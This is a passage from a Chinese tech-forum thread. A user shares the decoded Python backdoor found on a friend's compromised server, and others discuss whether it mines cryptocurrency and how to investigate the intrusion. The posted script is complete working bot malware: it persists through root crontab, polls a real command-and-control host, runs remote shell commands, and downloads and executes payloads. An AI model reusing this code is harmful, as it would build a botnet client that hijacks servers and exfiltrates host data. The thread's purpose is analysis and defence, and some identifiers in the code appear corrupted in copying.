这是一个创建于 2824 天前的主题,其中的信息可能已经有所发展或是发生改变。
朋友服务器被黑了(真开心)...上去发现有个 python 后门在跑,base64 一下拿到脚本;不太懂 python,准备重装了,大佬们有喜欢搞得可以看看
base64 后代码
#coding=utf-8 import sys reload(sys) sys.setdefaultencoding("utf-8") import urllib import socket socket.setdefaulttimeout(5) import subprocess import threading import time import base64 import os try: import uuid import platform except Exception,e: pass apiURL = "http://k.zsw8.cc/Api/" runCodePath = '/bin/httpsd' tmpPid= "/tmp/VWTFEdbwdaEjduiWar3adW" runCode = ''' #coding: utf-8 import urllib import base64 while True: try: page=base64.b64decode(urllib.urlopen("%s").read()) exec(page) except: pass time.sleep(1800) '''% (apiURL) class CommonWay(object): CommOnResult= [] def __init__(self):pass def start(self): try: base64RunCode = base64.b64encode(runCode) f = open(runCodePath, "w+") f.write("python -c \"import base64;exec(base64.b64decode('%s'))\"" % base64RunCode) f.close() os.chmod(runCodePath, 0777) f = open("/etc/crontab", "r") crOntabData= f.read() f.close() if runCodePath not in crontabData: f = open("/etc/crontab", "a+") f.write("\n0 */6 * * * root %s\n" % runCodePath) f.close() except Exception, e: pass def kill(self): try: try: f = open(tmpPid, 'r') pid = int(f.read()) f.close() #os.system("kill -9 %d" % pid) os.kill(pid, 9) except Exception, e: pass pid = os.getpid() f = open(tmpPid, 'w+') f.write(str(pid)) f.close() except Exception, e: pass def result(self, task_id, result): try: CommonWay.CommonResult.append({"id": task_id, "result": base64.b64encode(result)}) #print CommonWay.CommonResult for my_data in CommonWay.CommonResult: f = urllib.urlopen(apiURL, urllib.urlencode(my_data)) if f.getcode() == 200: CommonWay.CommonResult.remove(my_data) f.close() #print CommonWay.CommonResult except Exception, e: pass class CommonData(object): def __init__(self): pass @property def get_key(self): hostname = "" mac = "" try: hostname = base64.b64encode(socket.getfqdn(socket.gethostname()).strip()[:20]) mac = uuid.UUID(int = uuid.getnode()).hex[-12:] except Exception, e: pass return hostname+":"+mac @property def get_name(self): try: return base64.b64encode(socket.getfqdn(socket.gethostname()).strip()[:20]) except Exception, e: return "null" def __readCpuInfo(self): f = open('/proc/stat') lines = f.readlines() f.close() for line in lines: line = line.lstrip() counters = line.split() if len(counters) < 5: continue if counters[0].startswith('cpu'): break total = 0 for i in xrange(1, len(counters)): total = total + long(counters[i]) idle = long(counters[4]) return {'total': total, 'idle': idle} def __calcCpuUsage(self, counters1, counters2): idle = counters2['idle'] - counters1['idle'] total = counters2['total'] - counters1['total'] return 100 - (idle * 100 / total) @property def get_cpuuse(self): try: counters1 = self.__readCpuInfo() time.sleep(3) counters2 = self.__readCpuInfo() return str(self.__calcCpuUsage(counters1, counters2))+"%" except Exception, e: return "null" @property def get_cpucount(self): try: cpu_count = 0 f = open("/proc/cpuinfo") lines = f.readlines() f.close() for line in lines: if ':' in line: lineList = line.split(":", 2) if lineList[0].strip() == "cpu cores": cpu_count = int(lineList[1].strip()) break return cpu_count except Exception, e: return 0 @property def get_core(self): try: return platform.architecture()[0] except Exception, e: return "null" @property def get_platform(self): try: import platform return platform.system() except Exception, e: return "null" @property def get_status(self): try: return "None" except Exception, e: return "None" class CmdExec(object): def __init__(self, cmd, task_id): self.task_cmd = cmd self.task_id = task_id self.run() def run(self): t = threading.Thread(target=self.exec_cmd) t.setDaemon(True) t.start() def exec_cmd(self): try: mytask = subprocess.Popen(self.task_cmd, shell=True, stdin=subprocess.PIPE, stdout=subprocess.PIPE, stderr=subprocess.STDOUT) myCmdResult = mytask.stdout.read() #print self.task_id, myCmdResult #print myCmdResult, self.task_id c = CommonWay() c.result(self.task_id, myCmdResult) except Exception, e: pass class DownExec(object): def __init__(self, downloadurl, taskid): self.downloadurl = downloadurl self.taskid = taskid self.run() def run(self): t = threading.Thread(target=self.download) t.setDaemon(True) t.start() def schedule(self, a, b, c): # a: block count # b: block size # c: file size per = 100.0 * a * b / c if per > 100: per = 100 #print '%.2f%%' % per def download(self): try: f = urllib.urlretrieve(self.downloadurl, filename=None, reporthook=self.schedule, data=None) try: os.chmod(f[0], 0777) except: pass mytask = subprocess.Popen(f[0], shell=True, stdin=subprocess.PIPE, stdout=subprocess.PIPE, stderr=subprocess.STDOUT) myresult = mytask.stdout.read() # update result # print myresult, self.taskid c = CommonWay() c.result(self.taskid, myresult) except Exception, e: pass def __del__(self): urllib.urlcleanup() class Client(object): def __init__(self): self.r_time = 30 self.runMain() def get_task(self): try: code = 0 html = "" d = CommonData() my_data = {"key": d.get_key} f = urllib.urlopen(apiURL, urllib.urlencode(my_data)) code = f.getcode() html = f.read() f.close() data = eval(html) if data.has_key("id") and data["id"]: task_id = data["id"] if data.has_key("download") and dta["download"]: DownExec(data["download"], task_id) if data.has_key("cmd") and data["cmd"]: CmdExec(data["cmd"], task_id) else: self.r_time = int(data["rtime"]) except Exception, e: return False def up_online(self): try: code = 0 html = "" d = CommonData() my_data = {"key":d.get_key, "name":d.get_name, "os":d.get_platform, "core":d.get_core, "cpu":d.get_cpucount, "cpuuse":d.get_cpuuse, "status":d.get_status} f = urllib.urlopen(apiURL, urllib.urlencode(my_data)) code = f.getcode() #html = f.read() f.close() if code == 200: return True else: return False except Exception, e: return False def runMain(self): try: commOnWay= CommonWay() commonWay.start() commonWay.kill() while True: if not self.up_online(): time.sleep(60) continue self.get_task() time.sleep(self.r_time) except Exception, e: pass if __name__ == "__main__": c = Client()  | 1 gleymonkey 2018-01-16 18:25:34 +08:00 一看这网址就知道是挖矿的。 |
 | 2 mritd OP @gleymonkey cpu 百分百,绝壁挖矿,哈哈 |
 | 3 trys1 2018-01-16 18:46:38 +08:00 via Android 比较好奇你怎么被黑的,弱口令? 以及以后该如何预防 |
 | 4 huangunic0rn 2018-01-16 18:50:22 +08:00 via Android 反弹 shell?有大佬解释一下嘛 |
 | 6 closedevice 2018-01-16 18:51:34 +08:00 写的一般,挖矿脚本 |
 | 10 kokutou 2018-01-16 19:06:55 +08:00  1 感觉只要开了 22,开机不出 5 分钟就有个登陆失败 log。。。 |
 | 14 t333st 2018-01-17 10:49:12 +08:00 该脚本没看出挖矿相关,就是一个远控相关脚本 |
 | 15 jeffson 2018-01-17 15:30:29 +08:00 关注! |
 | 16 findex 2018-04-14 03:06:38 +08:00 看了一下。是用挖矿的脚本。简单说说,数了数 cpu 等情况,开了多线程、自动下载 blocks 还有 size 校对,远程挖矿。而且是客户端,需要远程服务器分配任务来挖指定的片区。没看明白脚本的同学,经验还是不够。meltdown 之后变异漏洞太多。我看过不少的了。又用 perl 写的,有用 python 写的,伪装成各种文件。基本上就是这两种发行版会自带的语言解释器。先提权,再运行肉鸡代码。遇到这种情况,打补丁晚了。看看核心数据有没有被盗吧。sshd_config 有没有被改,有没有增加一个新的类似于 dropbear 的轻量 ssh 客户端在运行,或者其他后门程序。cron 被修改了没,是否加入了 authenticate_key。是否修改 /添加了其他用户。看看系统 log。看看 history (我见过有 cracker 写过 wipe log 的程序,可是入侵的时候忘记运行了,留下了马尾,是团伙作案,分工明确,但是还是有菜鸟去操作的)。这样可以把 cracker 找出来。但是 cracker 的 ip 有一定的匿名性,不过有些胆大的就不用 daili IP。业务价值含量高的话,分配点人力物力去追出来。不太重要的话,就随意了。这样搞的,欧洲居多,东欧最多。美中也不少。 |
Select Language